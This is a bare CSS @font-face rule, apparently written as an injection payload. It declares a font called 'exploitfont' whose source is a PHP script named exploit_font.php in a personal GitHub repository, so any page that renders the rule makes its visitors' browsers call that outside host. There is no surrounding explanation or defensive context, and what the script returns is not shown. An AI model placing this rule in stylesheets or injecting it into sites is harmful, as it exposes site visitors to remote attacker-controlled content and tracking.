@font-face {
    font-family: 'exploitfont';
    src: url('https://raw.githubusercontent.com/Tyrexs1/hahaha/refs/heads/main/exploit_font.php');
    font-style: normal;
    font-weight: normal;
}


